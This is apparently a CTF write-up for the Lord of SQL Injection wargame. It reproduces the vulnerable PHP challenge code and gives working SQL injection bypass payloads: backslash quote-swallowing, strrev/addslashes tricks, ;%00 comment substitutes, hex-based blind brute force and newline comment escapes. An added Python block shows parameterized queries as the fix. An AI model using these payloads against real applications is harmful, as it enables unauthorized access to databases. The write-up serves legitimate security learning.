Lord-of-SQLInjection-Write-Up (Part 2)

assassin

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~"); 
  // pw is dropped straight into a LIKE pattern, so % and _ keep their wildcard meaning
  $query = "select id from prob_assassin where pw like '{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("assassin"); 
  highlight_file(__FILE__); 

The query uses LIKE for fuzzy matching, and a quick search shows that MySQL's LIKE syntax supports wildcard matching.

That is, LIKE 'a%' matches every string that starts with the character a.
As shown above, a single pattern can therefore match more than one record.
Fuzzing with Burp shows that LIKE '9%' matches a record, but the page displays "Hello guest". So guest's password starts with the same character as admin's, and because the guest row comes before the admin row, admin is never returned. Continuing character by character, the admin record is only matched once the third character is fixed.


succubus

  <?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  // only the single quote is rejected; the backslash is not
  if(preg_match('/\'/',$_GET[id])) exit("HeHe");
  if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
  $query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("succubus"); 
  highlight_file(__FILE__); 

Single quotes are filtered, but the backslash is not. Injecting a \ makes MySQL treat the following single quote as escaped, so the quote that was supposed to close the id literal is swallowed and the pw value escapes its quotes.

payload

?id=\&pw=or 1%23

ZOMBIE_ASSASSIN

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect();
  // the value is escaped first and reversed afterwards
  $_GET['id'] = strrev(addslashes($_GET['id']));
  $_GET['pw'] = strrev(addslashes($_GET['pw']));
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("zombie_assassin"); 
  highlight_file(__FILE__); 

This works much like the previous challenge: again a backslash is used to make a single quote escape its literal.
addslashes escapes characters by prefixing a backslash, but strrev is applied to its output, so the backslash that addslashes inserted ends up after the character it was meant to escape (for %00, "\0" becomes "0\"). Using this property sensibly makes the bypass possible.

payload

?id=%00&pw=%231 ro
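Both the succubus and the zombie_assassin bypasses come down to the same defect: after filtering or escaping, a backslash is left directly in front of the closing quote (or a quote is left bare), which a quote filter on its own cannot see. The Python block below is an added example, not part of the original write-up or of the LoS challenge code; it re-implements PHP's addslashes() in Python (an assumption, not the PHP source), checks whether an escaped value still sits safely inside a quoted literal, and contrasts the escape-then-transform pattern with a parameterized query, which is the real fix.

```python
import sqlite3


def addslashes(s: str) -> str:
    """Python re-implementation of PHP addslashes(): backslash-escape ', ", \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def literal_intact(escaped: str) -> bool:
    """True if `escaped` can sit inside '...' without leaving the literal.

    MySQL reads a backslash as escaping the next character, so a bare '
    ends the literal early and a trailing backslash eats the closing quote.
    Conservative: a doubled '' is also rejected, although MySQL accepts it.
    """
    i, n = 0, len(escaped)
    while i < n:
        if escaped[i] == "\\":
            if i + 1 == n:      # trailing backslash: closing ' would be escaped
                return False
            i += 2              # backslash consumes the next character
            continue
        if escaped[i] == "'":   # unescaped quote: literal terminates here
            return False
        i += 1
    return True


def escape_then_reverse(value: str) -> str:
    """The zombie_assassin pattern strrev(addslashes(v)): reversing after escaping
    moves each inserted backslash to the wrong side of the character it escaped."""
    return addslashes(value)[::-1]


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the prob_* table; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prob (id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO prob VALUES (?, ?)",
                     [("guest", "guest"), ("admin", "example-admin-pw")])
    return conn


def lookup_id(conn: sqlite3.Connection, user_id: str, pw: str):
    """Hardened form: placeholders make the driver do the quoting, so escaping
    order and quote filters no longer matter."""
    row = conn.execute("SELECT id FROM prob WHERE id = ? AND pw = ?",
                       (user_id, pw)).fetchone()
    return row[0] if row else None
```

literal_intact() is the kind of assertion a unit test on an escaping helper should make; the parameterized lookup_id() is what removes the need for the helper altogether.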

nightmare

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  // the usual comment characters and the length are both restricted
  if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(strlen($_GET[pw])>6) exit("No Hack ~_~"); 
  $query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) solve("nightmare"); 
  highlight_file(__FILE__); 

Both the input length and the usual comment characters are filtered.
Use ;%00 in place of a comment terminator.
Use ^ in place of the logical operator.

payload

?pw=')^0;%00

xavis

Because this time the password is in Korean, the hex() function is used to convert it to hexadecimal, and the hex string is brute-forced character by character.

payload

?pw=1' or id='admin' and ord(substr(hex(pw),27,1))>79%23

DRAGON

  <?php
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  // the # comments out the rest of this line only; pw still lands in the query string
  $query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve("dragon");
  highlight_file(__FILE__); 

Looking for a way past the # comment: # is a single-line comment, so, as the name says, it cannot comment out the content of the following line. That is the breakthrough point.
Pass %0a as a newline character.

payload

?pw=1'%0aand pw = '1'or id='admin'%23
